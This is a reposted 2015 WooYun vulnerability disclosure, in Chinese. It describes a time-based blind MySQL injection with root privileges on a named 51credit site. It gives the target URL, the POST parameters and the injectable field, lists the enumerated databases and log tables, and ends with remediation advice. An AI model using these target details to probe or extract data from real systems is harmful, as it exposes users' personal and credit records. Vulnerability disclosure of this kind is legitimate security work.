记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

我爱卡某站mysql注入(root权限)泄露大量敏感信息

2015-05-22 18:05

POST请求,

URL:http://kaku.51credit.com/tag/index.html

POST参数:cardNameHidden=&cardNameInput=11&searchNamePage=1

存在问题的参数:cardNameInput



是基于时间的盲注

2.jpg



6.jpg

漏洞证明:

权限比较高

1.jpg



可用的数据库

available databases [3]:

[*] auditdb

[*] information_schema

[*] woaikatags



Database: auditdb

[1 table]

+-----------+

| accesslog |

+-----------+

既然有访问日志这张表,那么说明有一些敏感信息可能会泄露





Database: woaikatags

[25 tables]

+-----------------------------------+

| crcredit_apply_2015_log |

| dict_city |

| dict_province |

| discount_activity |

| discount_activityershop |

| discount_activityspecial |

| discount_attribute |

| discount_images |

| discount_operation_log |

| discount_shop |

| discount_shopbrand |

| discount_specialeractivity |

| tag_cardassociationmoretags |

| tag_cardassociationtags |

| tag_cardseriesassociation_temp |

| tag_cardseriesassociationmoretags |

| tag_cardseriesassociationtags |

| tag_logoimage |

| tag_preferentialassociationtags |

| tag_preferentiaseriesmoretags |

| tag_tagcategory |

| tag_tagerbank |

| tag_taginitial |

| tag_tagrelevancecategory |

| tag_userlogs |

+-----------------------------------+

这里面也有很多日志 类似tag_userlogs crcredit_apply_2015_log用户日志等

没有去看具体数据。







修复方案:

1.过滤最基本的特殊字符 单引号

2.在业务没有影响的情况下过滤其他特殊字符 例如#,/,*,空格等

3.关键字的过滤,具体问题具体分析这 AND ,OR,一些复杂计算的函数方法等

4.构造结构化的SQL查询语句。

知识来源: www.wooyun.org/bugs/wooyun-2015-0106408

阅读:77358 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“我爱卡某站mysql注入(root权限)泄露大量敏感信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云